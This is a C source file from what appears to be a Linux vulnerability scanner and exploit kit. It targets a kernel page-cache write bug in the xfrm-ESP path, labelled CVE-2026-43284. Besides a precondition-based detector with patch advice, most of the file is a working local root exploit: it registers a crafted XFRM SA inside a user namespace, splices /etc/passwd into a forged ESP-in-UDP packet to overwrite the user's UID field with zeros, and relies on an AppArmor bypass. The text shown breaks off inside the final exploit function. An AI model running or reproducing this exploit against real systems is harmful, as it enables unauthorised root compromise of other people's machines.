SKELETONKEY/modules/copy_fail_family/dirtyfrag_esp.c

/*
 * DIRTYFAIL — dirtyfrag_esp.c — Dirty Frag xfrm-ESP variant
 *                                CVE-2026-43284
 *
 * BACKGROUND
 * ----------
 * In Linux, esp_input() runs the AEAD decryption in-place on the
 * incoming skb. Before that, an skb whose payload sits in a frag (i.e.
 * not in the linear head — the case that arises when userspace plants
 * a page via splice()) is supposed to be cloned out into kernel-owned
 * memory by skb_cow_data(). The bug:
 *
 *     if (!skb_cloned(skb)) {
 *         if (!skb_is_nonlinear(skb)) {
 *             nfrags = 1;
 *             goto skip_cow;
 *         } else if (!skb_has_frag_list(skb)) {
 *             nfrags = skb_shinfo(skb)->nr_frags;
 *             nfrags++;
 *             goto skip_cow;          // <-- vulnerable branch
 *         }
 *     }
 *
 * If the skb has frags but no frag_list, esp_input skips the COW and
 * runs in-place AEAD on the user-supplied page. The same authencesn
 * scratch-write that powers Copy Fail then lands at file offset
 * (assoclen + cryptlen) inside that page. The 4 STOREd bytes are
 * `seq_hi` from the SA's replay_esn state, which userspace controls
 * via XFRMA_REPLAY_ESN_VAL on SA registration.
 *
 * Net result: same 4-byte arbitrary-offset write into a page-cache
 * page as Copy Fail, but reachable via the xfrm path *even when
 * algif_aead is blacklisted as a Copy Fail mitigation*.
 *
 * COST: registering an XFRM SA needs CAP_NET_ADMIN, so the attacker
 * must enter a fresh user namespace first. This is allowed by default
 * on most distros except hardened Ubuntu (AppArmor restrict_unprivileged_userns).
 *
 * DETECTION STRATEGY
 * ------------------
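 * Precondition-based: we report VULNERABLE when *all* of these hold:
 *   - kernel >= 4.10 (commit cac2661c53f3, 2017-01-17) and not patched
 *     (the version is only logged: distro backports can't be told
 *     apart, so it does not gate the verdict)
 *   - esp4 module loadable (we don't insmod; rely on autoload — the
 *     current esp4/esp6 load state is logged as a hint only)
 *   - unprivileged user namespace creation works
 *   - AppArmor does not strip capabilities inside the new userns
 *
 * Avoiding the actual primitive in the default detect mode keeps the
 * system undisturbed (no namespaces created in the parent, no encap
 * sockets, no transient SAs). With --active, detection additionally
 * fires the primitive against a throwaway sentinel file in /tmp. The
 * exploit path runs the full primitive for real.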
 *
 * EXPLOIT STRATEGY
 * ----------------
 * Same UID-flip as Copy Fail, but driven through xfrm:
 *
 *   1.  fork() — parent stays in init userns to call su afterwards
 *   2.  child: unshare(CLONE_NEWUSER | CLONE_NEWNET)
 *   3.  child: write deny → /proc/self/setgroups
 *   4.  child: write "0 <real_uid> 1" → /proc/self/uid_map (and gid_map)
 *   5.  child: ioctl SIOCSIFFLAGS to bring lo UP
 *   6.  child: open NETLINK_XFRM, register SA with:
 *               proto=ESP, mode=TRANSPORT, flags=XFRM_STATE_ESN,
 *               alg=authencesn(hmac(sha256),cbc(aes)) (zero keys),
 *               encap=ESPINUDP sport=dport=4500,
 *               replay_esn.seq_hi = "0000"   (the 4 bytes that will land)
 *   7.  child: open udp_recv @ 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP
 *              and udp_send connected to 127.0.0.1:4500
 *   8.  child: pipe(); vmsplice forged ESP wire header (24 bytes) →
 *              splice /etc/passwd at uid_off, len 16 → splice pipe → udp_send
 *   9.  child: recvmsg drives the kernel through the esp_input path,
 *              firing the 4-byte STORE of "0000" into /etc/passwd
 *              at the user's UID offset
 *  10.  child: exits, parent verifies via fresh open of /etc/passwd
 *  11.  parent: execlp("su", username) — PAM checks /etc/shadow on
 *              disk (untouched), gets right password, setuid(0) lands
 *              us at root because the page-cache copy of /etc/passwd
 *              now lists us as UID 0.
 */

#include "dirtyfrag_esp.h"
#include "apparmor_bypass.h"

#include <fcntl.h>
#include <pwd.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/uio.h>

#ifdef __linux__
#include <sys/syscall.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>
#include <linux/if.h>
#include <sys/ioctl.h>
#endif

/* UDP_ENCAP / UDP_ENCAP_ESPINUDP live in <linux/udp.h>, but that header
 * conflicts with <netinet/udp.h> over `struct udphdr` and we don't
 * actually need the struct. The kernel constants are stable, so we
 * just hard-code them as fallbacks (the #ifndef makes this a no-op if
 * the toolchain happens to expose them already). */
#ifndef UDP_ENCAP
#define UDP_ENCAP             100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP      2
#endif
#ifndef IPPROTO_ESP
#define IPPROTO_ESP            50
#endif

/* Platform shims.
 *
 * Non-Linux builds get placeholder constants, dummy struct definitions
 * and stub splice()/vmsplice()/ioctl() wrappers so that code referring
 * to them can still be compiled; every stub sets errno to ENOSYS and
 * returns -1. Linux builds only get explicit prototypes for
 * splice()/vmsplice().
 * NOTE(review): presumably the prototypes are spelled out because the
 * libc headers only declare them under _GNU_SOURCE — confirm. */
#ifndef __linux__
#define CLONE_NEWUSER 0x10000000
#define CLONE_NEWNET  0x40000000
#define IFF_UP               0x01
#define IFF_RUNNING          0x40
#define SIOCSIFFLAGS     0x8914
/* Dummy definitions: only the type names are needed off Linux. */
struct sockaddr_in { int dummy; };
struct ifreq      { int dummy; };
/* Stub: always fails with ENOSYS. */
__attribute__((unused))
static ssize_t splice (int a, void *b, int c, void *d, size_t e, unsigned f)
{ (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return -1; }
/* Stub: always fails with ENOSYS. */
__attribute__((unused))
static ssize_t vmsplice(int a, const struct iovec *b, unsigned long c, unsigned d)
{ (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; }
/* Stub: always fails with ENOSYS; variadic arguments are ignored. */
__attribute__((unused))
static int     ioctl  (int a, unsigned long b, ...)
{ (void)a;(void)b; errno=ENOSYS; return -1; }
#else
extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out,
                      size_t len, unsigned int flags);
extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr,
                        unsigned int flags);
#endif

/* UDP port used for the SA's encapsulation template and for the
 * loopback receive/send sockets. */
#define ENCAP_PORT 4500
/* SPI of the SA registered by this module; the same value is placed in
 * the hand-built ESP wire header. */
#define ESP_SPI    0xDEADBE10
/* Four ASCII bytes copied into replay_esn.seq_hi and later searched for
 * when verifying whether the write landed. */
#define MARKER     "0000"
/* NOTE(review): not referenced anywhere in the visible part of this
 * file — the SA is built from separate auth + crypt attributes. Confirm
 * whether another translation unit or log message still needs it. */
#define ALG_NAME   "authencesn(hmac(sha256),cbc(aes))"

/* ---------------------------------------------------------------- *
 * Detection
 * ---------------------------------------------------------------- */

/*
 * Precondition-based detection for the xfrm-ESP variant.
 *
 * Logs the kernel version and esp4/esp6 load state as hints, then gates
 * on (1) unprivileged user namespaces being allowed and (2) AppArmor not
 * blocking capabilities inside them. When the global
 * dirtyfail_active_probes flag is set, the sentinel probe gets the first
 * say; its verdict is used unless it was inconclusive.
 *
 * Returns DF_PRECOND_FAIL when a gate fails, the active probe's verdict
 * when it is conclusive, and DF_VULNERABLE otherwise.
 */
df_result_t dirtyfrag_esp_detect(void)
{
    int major = -1;
    int minor = -1;

    log_step("Dirty Frag — xfrm-ESP variant (CVE-2026-43284) — detection");

    if (kernel_version(&major, &minor)) {
        log_hint("kernel %d.%d.x", major, minor);
    }

    /* Vulnerable branch: cac2661c53f3 (2017). Upstream fix:
     * f4c50a4034e6 (2026-05-07). Distro backports are not detectable
     * from here, so the verdict rests on prerequisites only. */

    /* /proc/modules only shows what is loaded right now; esp4/esp6 can
     * still autoload on the first SA registration. Loaded modules are
     * therefore a positive hint, absent ones are not a negative. */
    const bool esp4_loaded = kmod_loaded("esp4");
    const bool esp6_loaded = kmod_loaded("esp6");
    log_hint("esp4 currently loaded: %s", esp4_loaded ? "yes" : "no");
    log_hint("esp6 currently loaded: %s", esp6_loaded ? "yes" : "no");

    const bool userns_ok = unprivileged_userns_allowed();
    log_hint("unprivileged user namespace: %s", userns_ok ? "allowed" : "DENIED");

    /* Gate 1: no unprivileged userns, no CAP_NET_ADMIN, no SA. */
    if (!userns_ok) {
        log_ok("xfrm-ESP variant unreachable without unprivileged userns");
        log_hint("on Ubuntu, this is the expected hardening — but the RxRPC "
                 "variant of Dirty Frag may still be reachable. Run with "
                 "--check-rxrpc.");
        return DF_PRECOND_FAIL;
    }

    if (!(esp4_loaded || esp6_loaded)) {
        log_hint("no esp4/esp6 currently loaded; the kernel will autoload them "
                 "on first SA registration. We treat this as still vulnerable.");
    }

    /* Gate 2: hardened distros strip capabilities inside the userns.
     * The kernel bug may exist, but unprivileged users cannot reach it,
     * so this is reported as a failed precondition, not VULNERABLE. */
    if (apparmor_userns_caps_blocked()) {
        log_ok("LSM-mitigated — kernel may still have the bug but the AppArmor "
               "policy denies CAP_NET_ADMIN inside any unprivileged userns.");
        log_hint("unprivileged exploitation is blocked; real root can still "
                 "reach the kernel bug. Apply the kernel patch as soon as your "
                 "distro ships it.");
        return DF_PRECOND_FAIL;
    }

    /* Optional empirical check; only a conclusive verdict short-circuits. */
    if (dirtyfail_active_probes) {
        log_step("--active set: firing v4 ESP-in-UDP trigger against /tmp sentinel");
        df_result_t probe = dirtyfrag_esp_active_probe();
        const bool conclusive = (probe == DF_VULNERABLE)
                             || (probe == DF_OK)
                             || (probe == DF_PRECOND_FAIL);
        if (conclusive) {
            return probe;
        }
        log_warn("active probe inconclusive — falling back to precondition verdict");
    }

    log_warn("VULNERABLE (preconditions met) — userns + xfrm SA registration "
             "available, kernel within affected window");
    log_warn("apply mainline patch f4c50a4034e6 or your distro's backport");
    log_warn("interim mitigation: `dirtyfail --mitigate` or manually blacklist "
             "esp4/esp6 in /etc/modprobe.d/");
    log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe");
    return DF_VULNERABLE;
}

/* ---------------------------------------------------------------- *
 * Exploit — only compiled with full bodies on Linux.
 * ---------------------------------------------------------------- */

#ifdef __linux__

/*
 * Write a small string to a /proc file.
 *
 * path  — file to open write-only; it must already exist (no O_CREAT).
 * value — NUL-terminated text, handed to a single write(2).
 *
 * Returns true only when the whole string was accepted by that one
 * write. When open() or write() fails, errno still holds that call's
 * error on return, so callers can report it with strerror(errno); a
 * short write returns false without a meaningful errno.
 */
static bool write_proc(const char *path, const char *value)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return false;

    size_t  want = strlen(value);
    ssize_t got  = write(fd, value, want);

    /* close() may overwrite errno; keep the write() error for callers. */
    int saved_errno = errno;
    close(fd);
    errno = saved_errno;

    return got >= 0 && (size_t)got == want;
}

/* ---- Netlink XFRM SA registration --------------------------------- *
 *
 * The XFRM SA registration is built by hand. Each attribute is a 4-byte
 * aligned struct rtattr { u16 rta_len; u16 rta_type; } followed by
 * payload. The total nlmsg length is filled in last.
 *
 * Register an XFRM_MSG_NEWSA carrying our marker in replay_esn.seq_hi.
 *
 * nl     — NETLINK_XFRM socket used to send the request and read the ACK.
 * seq_hi — 4 bytes copied verbatim into replay_esn.seq_hi.
 *
 * Returns true when the request was sent and the first reply message is
 * not an NLMSG_ERROR with a non-zero error code. Returns false when
 * sendto() fails, the reply is shorter than a netlink header, or the
 * kernel reports an error (which is logged).
 */
static bool xfrm_register_sa(int nl, const unsigned char seq_hi[4])
{
    /* Zero-initialised so every field/padding byte not set below is 0. */
    char buf[2048] = {0};
    struct nlmsghdr  *nlh = (struct nlmsghdr  *)buf;
    struct xfrm_usersa_info *usa =
        (struct xfrm_usersa_info *)NLMSG_DATA(nlh);

    nlh->nlmsg_type  = XFRM_MSG_NEWSA;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
    nlh->nlmsg_seq   = 1;

    /* Selector: src/dst 127.0.0.1, IPv4 */
    usa->sel.daddr.a4 = htonl(0x7f000001);
    usa->sel.saddr.a4 = htonl(0x7f000001);
    usa->sel.family   = AF_INET;
    usa->sel.prefixlen_d = 32;
    usa->sel.prefixlen_s = 32;

    /* SA identity: destination 127.0.0.1, our fixed SPI, protocol ESP. */
    usa->id.daddr.a4  = htonl(0x7f000001);
    usa->id.spi       = htonl(ESP_SPI);
    usa->id.proto     = IPPROTO_ESP;

    usa->saddr.a4     = htonl(0x7f000001);

    /* All lifetime limits set to the maximum 64-bit value. */
    usa->lft.soft_byte_limit   = (uint64_t)-1;
    usa->lft.hard_byte_limit   = (uint64_t)-1;
    usa->lft.soft_packet_limit = (uint64_t)-1;
    usa->lft.hard_packet_limit = (uint64_t)-1;

    usa->reqid     = 0x1234;
    usa->family    = AF_INET;
    usa->mode      = XFRM_MODE_TRANSPORT;
    usa->replay_window = 0;       /* SA-level: 0; ESN-level (below): 32 */
    usa->flags     = XFRM_STATE_ESN;

    /* Attributes are appended directly after the fixed-size payload.
     * NOTE(review): this assumes sizeof(*nlh) + sizeof(*usa) is already
     * suitably aligned for struct rtattr — confirm. */
    size_t hdrlen = sizeof(*nlh) + sizeof(*usa);
    size_t attrs  = 0;            /* running byte count of attributes */
    char   *abuf  = buf + hdrlen;

    /*
     * The kernel's xfrm code does NOT accept `authencesn(...)` as a
     * single XFRMA_ALG_AEAD attribute — it's a composition that has
     * to be assembled from separate auth + crypt parts. We register:
     *   XFRMA_ALG_AUTH_TRUNC : hmac(sha256) with 32-byte key, 128-bit ICV
     *   XFRMA_ALG_CRYPT      : cbc(aes)     with 16-byte key
     *
     * The kernel internally wires these into authencesn(hmac(sha256),
     * cbc(aes)) when it sees XFRM_STATE_ESN on the SA.
     *
     * Both keys are left all-zero: the attribute payloads are memset to
     * 0 and no key material is copied in.
     */
    {  /* XFRMA_ALG_AUTH_TRUNC */
        struct xfrm_algo_auth *aa;
        unsigned short dlen = sizeof(*aa) + 32;   /* HMAC-SHA256 key */
        struct rtattr *r = (struct rtattr *)(abuf + attrs);
        r->rta_type = XFRMA_ALG_AUTH_TRUNC;
        r->rta_len  = RTA_LENGTH(dlen);
        aa = (struct xfrm_algo_auth *)RTA_DATA(r);
        memset(aa, 0, dlen);
        /* size - 1 plus the memset above keeps alg_name NUL-terminated */
        strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
        aa->alg_key_len   = 32 * 8;   /* bits */
        aa->alg_trunc_len = 128;      /* bits — truncated MAC width */
        attrs += RTA_SPACE(dlen);
    }
    {  /* XFRMA_ALG_CRYPT */
        struct xfrm_algo *ea;
        unsigned short dlen = sizeof(*ea) + 16;   /* AES-128 key */
        struct rtattr *r = (struct rtattr *)(abuf + attrs);
        r->rta_type = XFRMA_ALG_CRYPT;
        r->rta_len  = RTA_LENGTH(dlen);
        ea = (struct xfrm_algo *)RTA_DATA(r);
        memset(ea, 0, dlen);
        strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
        ea->alg_key_len = 16 * 8;     /* bits */
        attrs += RTA_SPACE(dlen);
    }

    /* XFRMA_REPLAY_ESN_VAL — this is where seq_hi rides */
    {
        struct xfrm_replay_state_esn *esn;
        unsigned short dlen = sizeof(*esn) + 4;  /* bmp_len * 4 = 4 */
        struct rtattr *r = (struct rtattr *)(abuf + attrs);
        r->rta_type = XFRMA_REPLAY_ESN_VAL;
        r->rta_len  = RTA_LENGTH(dlen);
        esn = (struct xfrm_replay_state_esn *)RTA_DATA(r);
        memset(esn, 0, dlen);
        esn->bmp_len       = 1;
        esn->oseq          = 0;
        esn->seq           = 100;
        esn->oseq_hi       = 0;
        memcpy(&esn->seq_hi, seq_hi, 4);  /* THE PRIMITIVE INPUT */
        esn->replay_window = 32;
        attrs += RTA_SPACE(dlen);
    }

    /* XFRMA_ENCAP — UDP encapsulation, sport=dport=4500 */
    {
        struct xfrm_encap_tmpl *enc;
        unsigned short dlen = sizeof(*enc);
        struct rtattr *r = (struct rtattr *)(abuf + attrs);
        r->rta_type = XFRMA_ENCAP;
        r->rta_len  = RTA_LENGTH(dlen);
        enc = (struct xfrm_encap_tmpl *)RTA_DATA(r);
        memset(enc, 0, dlen);
        enc->encap_type  = UDP_ENCAP_ESPINUDP;
        enc->encap_sport = htons(ENCAP_PORT);
        enc->encap_dport = htons(ENCAP_PORT);
        enc->encap_oa.a4 = 0;
        attrs += RTA_SPACE(dlen);
    }

    /* Total length is only known once every attribute is appended. */
    nlh->nlmsg_len = hdrlen + attrs;

    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    if (sendto(nl, buf, nlh->nlmsg_len, 0,
               (struct sockaddr *)&nladdr, sizeof(nladdr)) < 0)
        return false;

    /* Drain ACK. Only the first message in the reply is inspected; any
     * reply that is not an NLMSG_ERROR is treated as success. */
    char ack[4096];
    ssize_t n = recv(nl, ack, sizeof(ack), 0);
    if (n < (ssize_t)sizeof(struct nlmsghdr)) return false;
    struct nlmsghdr *r = (struct nlmsghdr *)ack;
    if (r->nlmsg_type == NLMSG_ERROR) {
        struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r);
        /* error == 0 is the positive ACK; otherwise a negated errno */
        if (e->error != 0) {
            log_bad("XFRM_MSG_NEWSA: %s", strerror(-e->error));
            return false;
        }
    }
    return true;
}

/*
 * Bring loopback up inside the new netns.
 *
 * Opens a throwaway AF_INET datagram socket and issues SIOCSIFFLAGS on
 * "lo" with IFF_UP | IFF_RUNNING.
 *
 * Returns true when the ioctl succeeds. On failure errno holds the
 * error from socket() or ioctl(), so callers can report it with
 * strerror(errno).
 */
static bool bring_lo_up(void)
{
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0)
        return false;

    struct ifreq ifr;
    memset(&ifr, 0, sizeof(ifr));
    /* ifr is zeroed, so copying at most IFNAMSIZ - 1 bytes keeps the
     * name NUL-terminated. */
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
    ifr.ifr_flags = IFF_UP | IFF_RUNNING;

    int rc = ioctl(s, SIOCSIFFLAGS, &ifr);

    /* close() may overwrite errno; keep the ioctl() error for callers. */
    int saved_errno = errno;
    close(s);
    errno = saved_errno;

    return rc == 0;
}

/* Trigger esp_input by sending a forged ESP-in-UDP packet whose payload
 * is a page-cache page from `target_path`, planted via splice at
 * `splice_off`. The kernel STORE lands ~14 bytes into the spliced
 * region (the v4 path has no V6_STORE_SHIFT-style offset).
 *
 * target_path — file opened read-only and spliced from.
 * splice_off  — byte offset in that file where the 16-byte splice starts.
 *
 * Returns true when every setup step and all three splice calls
 * succeeded; false (after logging, for most steps) otherwise. A true
 * return only means the packet was sent — it does not say whether the
 * target bytes changed; callers check that separately. All descriptors
 * opened here are closed on every path. */
static bool trigger_store_at(const char *target_path, loff_t splice_off)
{
    /* udp_recv: bound to 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP set so
     * incoming UDP frames are rerouted into xfrm_input -> esp_input. */
    int udp_recv = socket(AF_INET, SOCK_DGRAM, 0);
    if (udp_recv < 0) return false;
    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_port   = htons(ENCAP_PORT),
        .sin_addr.s_addr = htonl(0x7f000001),
    };
    int reuse = 1;
    /* Best effort: the result of SO_REUSEADDR is deliberately ignored. */
    setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
    if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        log_bad("bind udp_recv: %s", strerror(errno));
        close(udp_recv); return false;
    }
    int encap = UDP_ENCAP_ESPINUDP;
    if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
        log_bad("UDP_ENCAP_ESPINUDP: %s", strerror(errno));
        close(udp_recv); return false;
    }

    /* udp_send: connect to udp_recv. Packets we splice here will arrive
     * at udp_recv via loopback and feed xfrm_input. */
    int udp_send = socket(AF_INET, SOCK_DGRAM, 0);
    if (udp_send < 0) { close(udp_recv); return false; }
    if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        log_bad("connect udp_send: %s", strerror(errno));
        close(udp_recv); close(udp_send); return false;
    }

    /* Build wire ESP header: SPI(4) || seq_no(4) || IV(16) = 24 bytes.
     * IV value doesn't matter — auth check fails after the STORE.
     * NOTE(review): the two stores below go through a uint32_t pointer
     * into an unsigned char array; this relies on the array being
     * suitably aligned and on the compiler tolerating the type pun. */
    unsigned char wire_hdr[24];
    *(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI);
    *(uint32_t *)(wire_hdr + 4) = htonl(101);  /* seq_no_lo */
    memset(wire_hdr + 8, 0xCC, 16);

    /* Open the target file for splicing. */
    int pfd = open(target_path, O_RDONLY);
    if (pfd < 0) {
        log_bad("open %s: %s", target_path, strerror(errno));
        close(udp_recv); close(udp_send); return false;
    }

    int p[2];
    if (pipe(p) < 0) {
        log_bad("pipe: %s", strerror(errno));
        close(pfd); close(udp_recv); close(udp_send); return false;
    }

    /* vmsplice the wire header into the pipe (24 bytes). */
    struct iovec iov = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) };
    if (vmsplice(p[1], &iov, 1, 0) != (ssize_t)sizeof(wire_hdr)) {
        log_bad("vmsplice header: %s", strerror(errno));
        close(p[0]); close(p[1]); close(pfd);
        close(udp_recv); close(udp_send); return false;
    }
    /* splice 16 bytes of target's page cache from splice_off.
     * A local copy is used because splice() updates the offset. */
    loff_t off = splice_off;
    if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) {
        log_bad("splice file->pipe: %s", strerror(errno));
        close(p[0]); close(p[1]); close(pfd);
        close(udp_recv); close(udp_send); return false;
    }
    /* splice the whole 40-byte payload from pipe to udp_send. */
    if (splice(p[0], NULL, udp_send, NULL, 24 + 16, SPLICE_F_MOVE) != 40) {
        log_bad("splice pipe->udp: %s", strerror(errno));
        close(p[0]); close(p[1]); close(pfd);
        close(udp_recv); close(udp_send); return false;
    }
    close(p[0]); close(p[1]);

    /* Give the receive path time to run, then drain the socket. We
     * don't care about the actual recv data (auth is expected to fail
     * with EBADMSG), so the recv() result is ignored.
     *
     * The usleep is a fixed grace period, not a synchronisation
     * primitive: it is meant to let the in-place decrypt finish before
     * the sockets are torn down. On a busy or slow VM, splice() can
     * return before esp_input has actually fired. V4bel's reference
     * exploit uses the same 150ms wait. */
    usleep(150 * 1000);
    unsigned char drain[256];
    (void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT);

    close(pfd);
    close(udp_recv);
    close(udp_send);
    return true;
}

/* Compatibility wrapper for the exploit path: target /etc/passwd. */
static bool trigger_store(off_t passwd_off)
{
    return trigger_store_at("/etc/passwd", passwd_off);
}

/*
 * Self-contained child-side sequence: enter a new user + network
 * namespace, map the caller's uid/gid to 0, bring lo up, register the
 * SA and fire the trigger against /etc/passwd at `passwd_off`.
 *
 * passwd_off — byte offset in /etc/passwd handed to trigger_store().
 * real_uid   — uid outside the namespace, mapped to uid 0 inside.
 * real_gid   — gid outside the namespace, mapped to gid 0 inside.
 *
 * Returns 0 on success and 1 on any failure (after logging).
 *
 * NOTE(review): marked unused and not called anywhere in the visible
 * part of this file — confirm whether it is still needed.
 */
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
    if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) {
        log_bad("unshare: %s", strerror(errno));
        return 1;
    }
    /* setgroups is denied before the gid_map write; see
     * user_namespaces(7) for why the order matters. */
    if (!write_proc("/proc/self/setgroups", "deny")) {
        log_bad("setgroups deny: %s", strerror(errno));
        return 1;
    }
    /* Map format: "<id inside> <id outside> <count>". */
    char map[64];
    snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_uid);
    if (!write_proc("/proc/self/uid_map", map)) {
        log_bad("uid_map: %s", strerror(errno));
        return 1;
    }
    snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_gid);
    if (!write_proc("/proc/self/gid_map", map)) {
        log_bad("gid_map: %s", strerror(errno));
        return 1;
    }
    if (!bring_lo_up()) {
        log_bad("bring lo up: %s", strerror(errno));
        return 1;
    }

    int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (nl < 0) {
        log_bad("AF_NETLINK XFRM: %s", strerror(errno));
        return 1;
    }
    struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
    if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
        log_bad("bind netlink: %s", strerror(errno));
        close(nl); return 1;
    }

    /* xfrm_register_sa() logs its own kernel-reported errors. */
    if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
        close(nl); return 1;
    }
    log_ok("XFRM SA registered with seq_hi='%s'", MARKER);

    if (!trigger_store(passwd_off)) {
        log_bad("trigger failed");
        close(nl); return 1;
    }
    log_ok("ESP-in-UDP trigger fired");

    close(nl);
    return 0;
}

#else  /* __linux__ */
/* Non-Linux placeholder: ignores its arguments and always returns 1
 * (failure). */
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
    (void)passwd_off; (void)real_uid; (void)real_gid;
    return 1;
}
#endif

/* ---------------------------------------------------------------- *
 * INNER — runs in the AA bypass userns (post-stage 2).
 *
 * No user interaction, no fork, no verify, no su. Just the kernel
 * work: open netlink, register SA, fire splice trigger, exit.
 * The parent (init ns) owns everything else.
 * ---------------------------------------------------------------- */

/*
 * Inner stage of the exploit path.
 *
 * Reads the target user name from DIRTYFAIL_TARGET_USER, locates that
 * user's UID field in /etc/passwd (must be exactly 4 characters),
 * registers the SA over a NETLINK_XFRM socket and fires the trigger at
 * the UID field's offset.
 *
 * Returns DF_TEST_ERROR for bad input (missing env var, user not found,
 * UID width != 4, or a non-Linux build), DF_EXPLOIT_FAIL when a
 * netlink/SA/trigger step fails, and DF_EXPLOIT_OK once the trigger has
 * been fired.
 */
df_result_t dirtyfrag_esp_exploit_inner(void)
{
#ifndef __linux__
    log_bad("dirtyfrag_esp_exploit_inner: Linux-only");
    return DF_TEST_ERROR;
#else
    const char *target = getenv("DIRTYFAIL_TARGET_USER");
    if (target == NULL || target[0] == '\0') {
        log_bad("inner: DIRTYFAIL_TARGET_USER not set");
        return DF_TEST_ERROR;
    }

    off_t  field_off;
    size_t field_len;
    char   field_txt[16];
    if (!find_passwd_uid_field(target, &field_off, &field_len, field_txt)) {
        log_bad("inner: find_passwd_uid_field('%s') failed", target);
        return DF_TEST_ERROR;
    }
    if (field_len != 4) {
        log_bad("inner: UID '%s' is %zu chars; need 4", field_txt, field_len);
        return DF_TEST_ERROR;
    }

    int xfrm_sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (xfrm_sock < 0) {
        log_bad("inner: AF_NETLINK XFRM: %s", strerror(errno));
        return DF_EXPLOIT_FAIL;
    }

    /* From here on every exit goes through `done` to close the socket. */
    df_result_t outcome = DF_EXPLOIT_FAIL;
    struct sockaddr_nl local = { .nl_family = AF_NETLINK };

    if (bind(xfrm_sock, (struct sockaddr *)&local, sizeof(local)) < 0) {
        log_bad("inner: bind netlink: %s", strerror(errno));
        goto done;
    }

    if (!xfrm_register_sa(xfrm_sock, (const unsigned char *)MARKER))
        goto done;
    log_ok("inner: XFRM SA registered with seq_hi='%s'", MARKER);

    if (!trigger_store(field_off))
        goto done;
    log_ok("inner: ESP-in-UDP trigger fired at uid_off=%lld",
           (long long)field_off);

    outcome = DF_EXPLOIT_OK;

done:
    close(xfrm_sock);
    return outcome;
#endif
}

/* ---------------------------------------------------------------- *
 * OUTER — runs in init namespace.
 *
 * Prompts the operator, sets env vars, fork → child arms AA bypass
 * and runs the inner. Parent stays in init ns, waits, reads the
 * global page cache to verify, then either:
 *   - do_shell=true: execlp("su", user) — runs in init ns →
 *     PAM reads modified /etc/passwd → uid 0 → real init-ns root
 *   - do_shell=false: try_revert_passwd_page_cache, return.
 * ---------------------------------------------------------------- */

/*
 * Outer stage of the exploit path.
 *
 * do_shell — when true, finish by exec'ing `su <user>`; when false,
 *            attempt to revert the page cache and return.
 *
 * Returns:
 *   DF_OK           — already uid 0, or the operator declined either
 *                     confirmation prompt (nothing was attempted)
 *   DF_TEST_ERROR   — the current user could not be resolved, was not
 *                     found in /etc/passwd, or has a UID field that is
 *                     not exactly 4 characters wide
 *   DF_EXPLOIT_FAIL — the forked inner stage failed, verification of
 *                     /etc/passwd failed, or execlp() returned
 *   DF_EXPLOIT_OK   — write verified and do_shell was false
 * With do_shell true and a successful execlp(), this does not return.
 */
df_result_t dirtyfrag_esp_exploit(bool do_shell)
{
    log_step("Dirty Frag (xfrm-ESP) — exploit");

    uid_t uid = getuid();
    if (uid == 0) {
        log_warn("already root in init namespace — nothing to escalate");
        return DF_OK;
    }
    struct passwd *pw = getpwuid(uid);
    if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; }
    /* NOTE(review): pw_name points into storage owned by getpwuid();
     * it stays valid only while nothing called below invokes another
     * getpw*() function — confirm for the helpers used here. */
    const char *user = pw->pw_name;

    off_t  uid_off; size_t uid_len; char uid_str[16];
    if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
        log_bad("could not find %s in /etc/passwd", user);
        return DF_TEST_ERROR;
    }
    log_step("/etc/passwd UID for %s: '%s' at offset %lld",
             user, uid_str, (long long)uid_off);
    /* The marker is 4 bytes, so only a 4-character UID field is handled. */
    if (uid_len != 4) {
        log_bad("UID '%s' is %zu chars; this technique needs exactly 4",
                uid_str, uid_len);
        return DF_TEST_ERROR;
    }

    /* Operator gates: nothing below runs unless both confirmations are
     * given. */
    log_warn("about to run xfrm-ESP page-cache write against /etc/passwd");
    log_warn("this enters a fresh user/net namespace, registers an XFRM SA, "
             "and sends an ESP-in-UDP packet whose payload is the /etc/passwd "
             "page from offset %lld", (long long)uid_off);
